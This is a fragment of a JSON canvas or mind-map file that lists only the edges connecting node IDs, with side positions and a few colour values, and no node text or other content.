		{"id":"d27eb0756ffbe846","fromNode":"8dd532d66174f834","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"33f9ed71e66110c1","fromNode":"8c2a93016be5b298","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"d3f07db970084b8e","fromNode":"0581355edea7e0eb","fromSide":"right","toNode":"c30a20baf7474793","toSide":"left"},
		{"id":"fe2f97064fa67d9a","fromNode":"dbaaa78274848b06","fromSide":"right","toNode":"0581355edea7e0eb","toSide":"left"},
		{"id":"471f5c74e8dbfcce","fromNode":"2ecea737e06d4576","fromSide":"right","toNode":"4059fd2f11279a8b","toSide":"left"},
		{"id":"50266c0112ec0b08","fromNode":"dbaaa78274848b06","fromSide":"right","toNode":"2ecea737e06d4576","toSide":"left"},
		{"id":"848bac1a4fb845f0","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"dbaaa78274848b06","toSide":"left"},
		{"id":"a25c11159e680299","fromNode":"4059fd2f11279a8b","fromSide":"right","toNode":"14f23e71f8aef871","toSide":"left"},
		{"id":"cb014972ffc6d734","fromNode":"c30a20baf7474793","fromSide":"right","toNode":"14f23e71f8aef871","toSide":"left"},
		{"id":"cd03cd71ba0f525a","fromNode":"4f0282692097be94","fromSide":"right","toNode":"35463c1471f7d024","toSide":"left"},
		{"id":"d26cbb947434da70","fromNode":"35463c1471f7d024","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"d576edae1c2adeae","fromNode":"b13418b4cc74fb85","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"1e920c92f861fc00","fromNode":"e5712d4396ae46c0","fromSide":"right","toNode":"7a348eb82fc2e891","toSide":"left"},
		{"id":"8cea88df4c570636","fromNode":"7a348eb82fc2e891","fromSide":"right","toNode":"943c0a1d0316a739","toSide":"left"},
		{"id":"3f593ca6892613ee","fromNode":"d23beb5101c5b310","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"4e5f09bea413a167","fromNode":"59359e3a5c3d4535","fromSide":"left","toNode":"d23beb5101c5b310","toSide":"right"},
		{"id":"d95838e7e4c1f4ce","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"59359e3a5c3d4535","toSide":"right"},
		{"id":"5b679a6bd0d83153","fromNode":"5802a5970cdb4414","fromSide":"left","toNode":"ddee697d53d248fa","toSide":"right"},
		{"id":"7bd67505c0f23e98","fromNode":"71895cd69bc8c284","fromSide":"left","toNode":"b26f0d06c675a891","toSide":"right"},
		{"id":"1420eb30729b31da","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"5802a5970cdb4414","toSide":"right"},
		{"id":"e308fef08b5d9806","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"71895cd69bc8c284","toSide":"right"},
		{"id":"ed4d455c84631c55","fromNode":"ddee697d53d248fa","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"2d1232cd633e8ddc","fromNode":"b26f0d06c675a891","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"15b1f9a37e4fa1d9","fromNode":"f3ea36b511e6cb38","fromSide":"right","toNode":"048bd45e97ac5e8e","toSide":"left"},
		{"id":"926f15bcaf30ac64","fromNode":"a95530a364c21e64","fromSide":"left","toNode":"048bd45e97ac5e8e","toSide":"right","color":"#813dff"},
		{"id":"5bc171e7fb381683","fromNode":"eb62ad9b53d494db","fromSide":"left","toNode":"048bd45e97ac5e8e","toSide":"right","color":"#813dff"},
		{"id":"3d9bf88752c43a9e","fromNode":"a32d3fd204ae2b3c","fromSide":"left","toNode":"224e702c33b48662","toSide":"right","color":"#ff00bb"},
		{"id":"3d25450678479a60","fromNode":"c0ee4acd6dcb04a5","fromSide":"right","toNode":"224e702c33b48662","toSide":"left"},
		{"id":"b8a4b76220de1c41","fromNode":"f45b5e8cc10bbcac","fromSide":"right","toNode":"9aa5d75e4c1ad958","toSide":"left","color":"#009e1a"},
		{"id":"52a96ef302ec0e4c","fromNode":"799be8c0837a4cef","fromSide":"right","toNode":"f45b5e8cc10bbcac","toSide":"left"},
		{"id":"c106d07c3691e712","fromNode":"c0729f5bb50a8a7b","fromSide":"left","toNode":"9aa5d75e4c1ad958","toSide":"right"},
		{"id":"4fc27a32fd1feda9","fromNode":"e6be156740fe8e12","fromSide":"left","toNode":"c0729f5bb50a8a7b","toSide":"right"},
		{"id":"696e51f4eb49eac8","fromNode":"7ce1d35abaf50b9d","fromSide":"left","toNode":"a95530a364c21e64","toSide":"right"},
		{"id":"eafcb1940729561d","fromNode":"d7ea99611c53f233","fromSide":"left","toNode":"a95530a364c21e64","toSide":"right"},
		{"id":"3571582106a77fcf","fromNode":"95abd2a32999bab8","fromSide":"left","toNode":"d7ea99611c53f233","toSide":"right"},
		{"id":"c0a229210c324c57","fromNode":"b0c2b27bcb205003","fromSide":"left","toNode":"a32d3fd204ae2b3c","toSide":"right"},
		{"id":"a8cfe13aba163f93","fromNode":"3fecb1ebe42c8731","fromSide":"left","toNode":"b0c2b27bcb205003","toSide":"right"},
		{"id":"168671526308fc43","fromNode":"06c62ba47f1e50ab","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"4014751fc8e7d2ed","fromNode":"895c29f7455cc023","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"6151515a4c69f787","fromNode":"be169cacc794bf37","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"0d8041d1889d4db5","fromNode":"5fd703781b2d93ab","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"b43a24ac6d552e8d","fromNode":"55b6d27d3a3e25c6","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"203e54df58e463c1","fromNode":"fddf66eb4ff12f08","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"6a55c1c08f442511","fromNode":"38b3ecefe88947a5","fromSide":"right","toNode":"528cb8a87d17dc35","toSide":"left"},
		{"id":"2983e5df7ff45906","fromNode":"c2c61b05251f2739","fromSide":"left","toNode":"528cb8a87d17dc35","toSide":"right","color":"#d8be13"},
		{"id":"a878b3870eeeabb9","fromNode":"e990bc9697fe9e5e","fromSide":"left","toNode":"528cb8a87d17dc35","toSide":"right","color":"#d8be13"},
		{"id":"2c39199a0dce1225","fromNode":"5586847624a81ef2","fromSide":"right","toNode":"f3ea36b511e6cb38","toSide":"left"},
		{"id":"f536b23091f30326","fromNode":"d01f5285b0bc1753","fromSide":"right","toNode":"c0ee4acd6dcb04a5","toSide":"left"},
		{"id":"6a975b82844d6f3c","fromNode":"628b7cda3c9f3c36","fromSide":"right","toNode":"b168481adcaf3636","toSide":"left"},
		{"id":"4759fc1a07a0be8f","fromNode":"d1a38718e74294e4","fromSide":"right","toNode":"628b7cda3c9f3c36","toSide":"left"},
		{"id":"3daa49df7dd4f1fb","fromNode":"160e4136e5386cc0","fromSide":"right","toNode":"5586847624a81ef2","toSide":"left"},
		{"id":"df641ddd816c67d0","fromNode":"4f0f6aac24ecf50d","fromSide":"right","toNode":"06c62ba47f1e50ab","toSide":"left"},
		{"id":"e1e4d63224f3e1d3","fromNode":"4f0f6aac24ecf50d","fromSide":"right","toNode":"895c29f7455cc023","toSide":"left"},
		{"id":"0b0ecffa9cc8ee98","fromNode":"223ffcd06c3c1cc2","fromSide":"right","toNode":"4f0f6aac24ecf50d","toSide":"left"},
		{"id":"eac3ce8824baabd1","fromNode":"6570b2cd1aad3de5","fromSide":"right","toNode":"e809d59898209591","toSide":"left"},
		{"id":"0c29eb870171c2f7","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"6570b2cd1aad3de5","toSide":"left"},
		{"id":"112b4b30c7b77bae","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"d1a38718e74294e4","toSide":"left"},
		{"id":"036ff56c9b0542d0","fromNode":"c312e0abec42c216","fromSide":"right","toNode":"c4f5861a36279157","toSide":"left"},
		{"id":"b0a69a515fdc1ea0","fromNode":"d3221962061d7f0f","fromSide":"right","toNode":"c312e0abec42c216","toSide":"left"},
		{"id":"dc791daaf5055cb8","fromNode":"14f3cfe08c53f43c","fromSide":"right","toNode":"799be8c0837a4cef","toSide":"left"},
		{"id":"09a5635de601c833","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"160e4136e5386cc0","toSide":"left"},
		{"id":"c4321f76cf05db6f","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"14f3cfe08c53f43c","toSide":"left"},
		{"id":"1f4876d1daeb5a48","fromNode":"e809d59898209591","fromSide":"right","toNode":"b5241b6b165b8315","toSide":"left"},
		{"id":"4fe11b831d1c5536","fromNode":"abdc29d36545b130","fromSide":"right","toNode":"565ad1c87dccd73f","toSide":"left","color":"3"},
		{"id":"3f7a77812d799612","fromNode":"3da401f07cffb60c","fromSide":"right","toNode":"abdc29d36545b130","toSide":"left"},
		{"id":"7212363670dc06fe","fromNode":"ac6fe415aa607f66","fromSide":"right","toNode":"3da401f07cffb60c","toSide":"left"},
		{"id":"afcb966477860317","fromNode":"c5f5bd20928242f0","fromSide":"right","toNode":"ac6fe415aa607f66","toSide":"left"},
		{"id":"eb0b122033737e69","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"c5f5bd20928242f0","toSide":"left"},
		{"id":"9935e18148f1b407","fromNode":"7b577de4fedd4632","fromSide":"right","toNode":"1611cb26509cc566","toSide":"left"},
		{"id":"1e2efd29db9815f5","fromNode":"616fa7abc65cca82","fromSide":"right","toNode":"7b577de4fedd4632","toSide":"left"},
		{"id":"02175527578eb56d","fromNode":"e7c9391d1588b420","fromSide":"right","toNode":"6b74dce4be452663","toSide":"left"},
		{"id":"d4b907b201a6d388","fromNode":"616fa7abc65cca82","fromSide":"right","toNode":"e7c9391d1588b420","toSide":"left"},
		{"id":"1aa558763a81705c","fromNode":"223ffcd06c3c1cc2","fromSide":"right","toNode":"62f94536accd6287","toSide":"left"},
		{"id":"2d2c6f89d98d36a6","fromNode":"223ffcd06c3c1cc2","fromSide":"right","toNode":"6fad934266a7788c","toSide":"left"},
		{"id":"36cc6729003279c3","fromNode":"223ffcd06c3c1cc2","fromSide":"right","toNode":"d42c329b66d409a1","toSide":"left"},
		{"id":"6267e029cce681f9","fromNode":"223ffcd06c3c1cc2","fromSide":"right","toNode":"41960b78fab0ec44","toSide":"left"},
		{"id":"3250eeb6bbd4cf02","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"223ffcd06c3c1cc2","toSide":"left"},
		{"id":"088d3eb3d1fcbec7","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"d01f5285b0bc1753","toSide":"left"},
		{"id":"53fee1a6dbbcb256","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"616fa7abc65cca82","toSide":"left"},
		{"id":"08db8c9fd410fe17","fromNode":"1fd5b6e4b443eb54","fromSide":"right","toNode":"d3221962061d7f0f","toSide":"left"},
		{"id":"3e014192b964095c","fromNode":"b5241b6b165b8315","fromSide":"right","toNode":"e499c969e5800a32","toSide":"left"},
		{"id":"c338eab75924fbdd","fromNode":"66af2b4deed72708","fromSide":"left","toNode":"c4f5861a36279157","toSide":"right","color":"2"},
		{"id":"a98473689dd36114","fromNode":"1611cb26509cc566","fromSide":"right","toNode":"15751a7c47c279a0","toSide":"left"},
		{"id":"222fc59663b4a50f","fromNode":"43038080c798fd25","fromSide":"left","toNode":"15751a7c47c279a0","toSide":"right","color":"#e100ff"},
		{"id":"a9e2b7938343dca3","fromNode":"6b74dce4be452663","fromSide":"right","toNode":"15751a7c47c279a0","toSide":"left"},
		{"id":"a4bbb0bb50d0aeb6","fromNode":"63fb32c734c55b2b","fromSide":"left","toNode":"e499c969e5800a32","toSide":"right","color":"#00ccff"},
		{"id":"580bef90a0f7b0a6","fromNode":"8ab4b0fbd5376ba8","fromSide":"left","toNode":"b168481adcaf3636","toSide":"right","color":"4"},
		{"id":"ff15eb93fd2ea016","fromNode":"eaf12afed6faa47f","fromSide":"left","toNode":"5841bdd22cd930d1","toSide":"right"},
		{"id":"4df5b5ca04f7bbeb","fromNode":"03418a977bef5fae","fromSide":"left","toNode":"eaf12afed6faa47f","toSide":"right"},
		{"id":"64460d8c4d99414d","fromNode":"d4394602cf3638cb","fromSide":"left","toNode":"c2c61b05251f2739","toSide":"right"},
		{"id":"378b1b0240e1ddfc","fromNode":"9cab4bd7b4aedf18","fromSide":"left","toNode":"d4394602cf3638cb","toSide":"right"},
		{"id":"72cbbe75b9ef9bd8","fromNode":"44b86b6476dfbf35","fromSide":"left","toNode":"c2c61b05251f2739","toSide":"right"},
		{"id":"914f4f60ac7e472e","fromNode":"caaf6507395bc64b","fromSide":"left","toNode":"44b86b6476dfbf35","toSide":"right"},
		{"id":"b4364de03f43e687","fromNode":"f88296f1c79dc695","fromSide":"left","toNode":"c2c61b05251f2739","toSide":"right"},
		{"id":"0298f6e8650e7b6c","fromNode":"9cab4bd7b4aedf18","fromSide":"left","toNode":"f88296f1c79dc695","toSide":"right"},
		{"id":"6720fd8e0f37461e","fromNode":"b695a69ef6f29f11","fromSide":"left","toNode":"66af2b4deed72708","toSide":"right"},
		{"id":"a82df1f74bb7f3be","fromNode":"41960b78fab0ec44","fromSide":"right","toNode":"be169cacc794bf37","toSide":"left"},
		{"id":"28644b6ca84b3626","fromNode":"4cfab0a47ea31f54","fromSide":"right","toNode":"55b6d27d3a3e25c6","toSide":"left"},
		{"id":"4337153636db97cb","fromNode":"d42c329b66d409a1","fromSide":"right","toNode":"5fd703781b2d93ab","toSide":"left"},
		{"id":"ab02c230d6dd870d","fromNode":"62f94536accd6287","fromSide":"right","toNode":"4cfab0a47ea31f54","toSide":"left"},
		{"id":"71f15add986e1cd7","fromNode":"2f8f3df1d411ad0b","fromSide":"left","toNode":"20d8e7694a445abb","toSide":"right"},
		{"id":"08dedb3b2b597f24","fromNode":"e724a98f6db0d4bc","fromSide":"left","toNode":"2f8f3df1d411ad0b","toSide":"right"},
		{"id":"c5885c1614fa9eb7","fromNode":"329a3cd59f05cbd3","fromSide":"left","toNode":"b695a69ef6f29f11","toSide":"right"},
		{"id":"d7cde054e31d1c73","fromNode":"6316efe8da8a0631","fromSide":"left","toNode":"c2c61b05251f2739","toSide":"right"},
		{"id":"9c55669f5bcf8c29","fromNode":"9cab4bd7b4aedf18","fromSide":"left","toNode":"6316efe8da8a0631","toSide":"right"},
		{"id":"0e7e6631d4c2e6d8","fromNode":"be612178a8bb1381","fromSide":"left","toNode":"c2c61b05251f2739","toSide":"right"},
		{"id":"853168d0df4b4b81","fromNode":"c52766ba41c12492","fromSide":"left","toNode":"c2c61b05251f2739","toSide":"right"},
		{"id":"11c2a3f3986d9ad0","fromNode":"6fad934266a7788c","fromSide":"right","toNode":"38b3ecefe88947a5","toSide":"left"},
		{"id":"3e157daf213894a5","fromNode":"031f874932aea545","fromSide":"right","toNode":"fddf66eb4ff12f08","toSide":"left"},
		{"id":"93488dddcf392f45","fromNode":"62f94536accd6287","fromSide":"right","toNode":"031f874932aea545","toSide":"left"},
		{"id":"5a074b9d967e50d3","fromNode":"03418a977bef5fae","fromSide":"left","toNode":"e724a98f6db0d4bc","toSide":"right"},
		{"id":"d4198ad03ec301b6","fromNode":"47106886b6da1fc4","fromSide":"left","toNode":"03418a977bef5fae","toSide":"right"},
		{"id":"155511057d4deaa1","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"47106886b6da1fc4","toSide":"right"},
		{"id":"4b6b0ddaaaf5ce06","fromNode":"9cab4bd7b4aedf18","fromSide":"left","toNode":"caaf6507395bc64b","toSide":"right"},
		{"id":"70ab04441d8d3e72","fromNode":"9cab4bd7b4aedf18","fromSide":"left","toNode":"216b7b40feb0214e","toSide":"right"},
		{"id":"0c07554224d2bc92","fromNode":"9cab4bd7b4aedf18","fromSide":"left","toNode":"3e4bedcb3ca16c07","toSide":"right"},
		{"id":"0f62f03df2c1c041","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"9cab4bd7b4aedf18","toSide":"right"},
		{"id":"1b614241cdc49d85","fromNode":"5841bdd22cd930d1","fromSide":"left","toNode":"eb62ad9b53d494db","toSide":"right"},
		{"id":"c6ff8b51fbde49a0","fromNode":"9b55fe84d7f929ae","fromSide":"left","toNode":"e990bc9697fe9e5e","toSide":"right"},
		{"id":"5f4ef7fac5807fa1","fromNode":"adc2752bec8be250","fromSide":"left","toNode":"9b55fe84d7f929ae","toSide":"right"},
		{"id":"9caed40252119e35","fromNode":"8e05bf4e3b200b42","fromSide":"left","toNode":"e990bc9697fe9e5e","toSide":"right"},
		{"id":"c9efd8ba0add737f","fromNode":"adc2752bec8be250","fromSide":"left","toNode":"8e05bf4e3b200b42","toSide":"right"},
		{"id":"5f8ca4f0c02c3847","fromNode":"dd5697b10c676920","fromSide":"left","toNode":"adc2752bec8be250","toSide":"right"},
		{"id":"f0d4f54cda59ad36","fromNode":"3fe6b559ee33e053","fromSide":"left","toNode":"dac2251fa56939f6","toSide":"right"},
		{"id":"6aaa3d3b7efc97c3","fromNode":"0c90b23510c282cb","fromSide":"left","toNode":"3fe6b559ee33e053","toSide":"right"},
		{"id":"a2164ad63b40a507","fromNode":"dd5697b10c676920","fromSide":"left","toNode":"0c90b23510c282cb","toSide":"right"},
		{"id":"52a6feeedd0dd2f0","fromNode":"324b0da3bef5b4f2","fromSide":"left","toNode":"95abd2a32999bab8","toSide":"right"},
		{"id":"21ea2b50c1427988","fromNode":"324b0da3bef5b4f2","fromSide":"left","toNode":"2ecf93de91d05844","toSide":"right"},
		{"id":"37ad9ed739af77ab","fromNode":"13e41a9f4fc73b2c","fromSide":"left","toNode":"324b0da3bef5b4f2","toSide":"right"},
		{"id":"c173e0c6355ff053","fromNode":"dd5697b10c676920","fromSide":"left","toNode":"13e41a9f4fc73b2c","toSide":"right"},
		{"id":"3af166b9f2fea36d","fromNode":"2ecf93de91d05844","fromSide":"left","toNode":"7ce1d35abaf50b9d","toSide":"right"},
		{"id":"c8587308eff1d7da","fromNode":"20d8e7694a445abb","fromSide":"left","toNode":"eb62ad9b53d494db","toSide":"right"},
		{"id":"520b0b027f42663a","fromNode":"cd460cde27c9346e","fromSide":"left","toNode":"eb62ad9b53d494db","toSide":"right"},
		{"id":"631ce60f87ab71b2","fromNode":"e724a98f6db0d4bc","fromSide":"left","toNode":"cd460cde27c9346e","toSide":"right"},
		{"id":"7be542ac68c79576","fromNode":"dd5697b10c676920","fromSide":"left","toNode":"e6be156740fe8e12","toSide":"right"},
		{"id":"ce3622e72fe5175e","fromNode":"216b7b40feb0214e","fromSide":"left","toNode":"be612178a8bb1381","toSide":"right"},
		{"id":"882a6a20450f1199","fromNode":"3e4bedcb3ca16c07","fromSide":"left","toNode":"c52766ba41c12492","toSide":"right"},
		{"id":"71fa7b844be9b8ea","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"329a3cd59f05cbd3","toSide":"right"},
		{"id":"d6639878b3719bd3","fromNode":"dd5697b10c676920","fromSide":"left","toNode":"3fecb1ebe42c8731","toSide":"right"},
		{"id":"ccb96e5d61898a53","fromNode":"78a470023a061d53","fromSide":"left","toNode":"8ab4b0fbd5376ba8","toSide":"right"},
		{"id":"1e8239b62004a910","fromNode":"4d2687d6ab9ad1db","fromSide":"left","toNode":"78a470023a061d53","toSide":"right"},
		{"id":"faf2d1383d582661","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"4d2687d6ab9ad1db","toSide":"right"},
		{"id":"04ba006a3c1ba329","fromNode":"62cc2d85497ad911","fromSide":"left","toNode":"43038080c798fd25","toSide":"right"},
		{"id":"a2ac997dacde8163","fromNode":"50074d84e4e9d7d9","fromSide":"left","toNode":"62cc2d85497ad911","toSide":"right"},
		{"id":"438242c1ad9f6f3d","fromNode":"2e179fc61a34e29a","fromSide":"left","toNode":"63fb32c734c55b2b","toSide":"right"},
		{"id":"c4d65445d8188501","fromNode":"2925b9b2b4219b72","fromSide":"left","toNode":"2e179fc61a34e29a","toSide":"right"},
		{"id":"564361fb63cba4ab","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"2925b9b2b4219b72","toSide":"right"},
		{"id":"a9bd429318d3202c","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"50074d84e4e9d7d9","toSide":"right"},
		{"id":"387697b979cef804","fromNode":"bef0ac90542e4a99","fromSide":"left","toNode":"565ad1c87dccd73f","toSide":"right"},
		{"id":"a22cab10fba8fe72","fromNode":"6dba24947179a28b","fromSide":"left","toNode":"bef0ac90542e4a99","toSide":"right"},
		{"id":"2cb0fad1bef31c3f","fromNode":"dac2251fa56939f6","fromSide":"left","toNode":"c4f5861a36279157","toSide":"right","color":"2"},
		{"id":"6f256aa9a9d2908c","fromNode":"b05a16ba5dce685f","fromSide":"right","toNode":"6b30a5eae32d5064","toSide":"left"},
		{"id":"99b7860d5ed156eb","fromNode":"b05a16ba5dce685f","fromSide":"right","toNode":"8a6a0ea8cfb88e79","toSide":"left"},
		{"id":"44fba9d1eb43bdc4","fromNode":"6b30a5eae32d5064","fromSide":"right","toNode":"540ef394f10083a8","toSide":"left"},
		{"id":"9bca2b9c4cb019e1","fromNode":"376c682212b309ba","fromSide":"right","toNode":"e43a827d7c88f492","toSide":"left"},
		{"id":"ed43fd86110098d6","fromNode":"376c682212b309ba","fromSide":"right","toNode":"9cc070d7cc5c59fd","toSide":"left"},
		{"id":"8f889a9b0b94bcbc","fromNode":"7151e2b83c48c040","fromSide":"right","toNode":"a7c9f154619dba0e","toSide":"left"},
		{"id":"8a4c2bfa70ea6086","fromNode":"9cc070d7cc5c59fd","fromSide":"right","toNode":"7151e2b83c48c040","toSide":"left"},
		{"id":"b0f7318ed945c3d4","fromNode":"e43a827d7c88f492","fromSide":"right","toNode":"7f92f1fa67bd3f58","toSide":"left"},
		{"id":"c2952eb95040f7ff","fromNode":"9cc070d7cc5c59fd","fromSide":"right","toNode":"a5e9228a59c39813","toSide":"left"},
		{"id":"be312b2667954f3e","fromNode":"a5e9228a59c39813","fromSide":"right","toNode":"7dbb2ea9d65c288d","toSide":"left"},
		{"id":"2d6491ef29eb696e","fromNode":"7f92f1fa67bd3f58","fromSide":"right","toNode":"a2d5f3f3eecf8a37","toSide":"left","color":"5"},
		{"id":"6d9b5c329eb44e84","fromNode":"7f92f1fa67bd3f58","fromSide":"right","toNode":"563e976a998e99b4","toSide":"left","color":"5"},
		{"id":"ad4207083ad38b21","fromNode":"e43a827d7c88f492","fromSide":"right","toNode":"bc08b3e8030a4743","toSide":"left"},
		{"id":"7edc5aee066c483d","fromNode":"bc08b3e8030a4743","fromSide":"right","toNode":"b1b0ad78c9eb2922","toSide":"left","color":"6"},
		{"id":"ebc36c4625ed0276","fromNode":"bc08b3e8030a4743","fromSide":"right","toNode":"80b2e51e9873ebc0","toSide":"left","color":"6"},
		{"id":"94b523a3ac92c25b","fromNode":"7f92f1fa67bd3f58","fromSide":"right","toNode":"a97400b18a77bad3","toSide":"left","color":"5"},
		{"id":"911d6c273f8b9332","fromNode":"bc08b3e8030a4743","fromSide":"right","toNode":"b9f68c10f91e33bb","toSide":"left","color":"6"},
		{"id":"bf50f9384056cbab","fromNode":"7f92f1fa67bd3f58","fromSide":"right","toNode":"ae9fcb9213ebf9cc","toSide":"left","color":"5"},
		{"id":"ed36fc34b5c0f5ee","fromNode":"bc08b3e8030a4743","fromSide":"right","toNode":"a33bb78020bf3cd8","toSide":"left","color":"6"},
		{"id":"3ea7bbc3936ddeb4","fromNode":"8a6a0ea8cfb88e79","fromSide":"right","toNode":"b76504b5fa0bb53b","toSide":"top"},
		{"id":"be30940ecba81ffd","fromNode":"7f92f1fa67bd3f58","fromSide":"right","toNode":"04567ec031c1be62","toSide":"left","color":"5"},
		{"id":"4492e575672d50e2","fromNode":"160e4136e5386cc0","fromSide":"right","toNode":"a0bb132ce05efef7","toSide":"left"},
		{"id":"983727476ea57b29","fromNode":"a0bb132ce05efef7","fromSide":"right","toNode":"75d8442cea24c488","toSide":"left"},
		{"id":"bf1a1de99e9db6f4","fromNode":"75d8442cea24c488","fromSide":"right","toNode":"f91d0aecffc4f105","toSide":"left"},
		{"id":"5956ec009516640d","fromNode":"f91d0aecffc4f105","fromSide":"right","toNode":"8b5d40ca0716120a","toSide":"left"},
		{"id":"8297e6c379c505ab","fromNode":"8b5d40ca0716120a","fromSide":"right","toNode":"c2c61b05251f2739","toSide":"left","color":"5"},
		{"id":"59f98f536cc4ace0","fromNode":"47106886b6da1fc4","fromSide":"top","toNode":"ec22a913248692bf","toSide":"right"},
		{"id":"cfd6a55a4bc95d1c","fromNode":"ec22a913248692bf","fromSide":"left","toNode":"81e59a7263ddf314","toSide":"right"},
		{"id":"39533e9c833a1de1","fromNode":"141af34cfbec31a8","fromSide":"right","toNode":"81e59a7263ddf314","toSide":"left"},
		{"id":"098f8de3b1396c81","fromNode":"8b5d40ca0716120a","fromSide":"right","toNode":"141af34cfbec31a8","toSide":"left","color":"5"},
		{"id":"b6270bc51775601e","fromNode":"e81977e44c9be781","fromSide":"top","toNode":"0e6da9744b61366c","toSide":"right"},
		{"id":"58122edd4509428b","fromNode":"e81977e44c9be781","fromSide":"bottom","toNode":"5366fb544222be19","toSide":"right"},
		{"id":"0a0f36c26fa0fb34","fromNode":"c9e29c6718cf6207","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"81858082f1a0feee","fromNode":"4f0282692097be94","fromSide":"right","toNode":"daa3bf01bee80b60","toSide":"left"},
		{"id":"1092dcaad49243e9","fromNode":"daa3bf01bee80b60","fromSide":"right","toNode":"c9e29c6718cf6207","toSide":"left"},
		{"id":"97390257c7e9dcd4","fromNode":"393551d6b2b3357f","fromSide":"right","toNode":"58bb15df47c0290c","toSide":"left"},
		{"id":"6c6ec8950d27d691","fromNode":"73331fa21e9b88e4","fromSide":"right","toNode":"641b86993685cfc6","toSide":"left"},
		{"id":"19f5e924e26ed8bd","fromNode":"641b86993685cfc6","fromSide":"right","toNode":"86a66e604fa499f3","toSide":"left"},
		{"id":"978b88cd71d90864","fromNode":"86a66e604fa499f3","fromSide":"right","toNode":"206d8a6ac4824b5e","toSide":"left"},
		{"id":"7b4646b5e2b29a61","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"73331fa21e9b88e4","toSide":"left"}
	]
}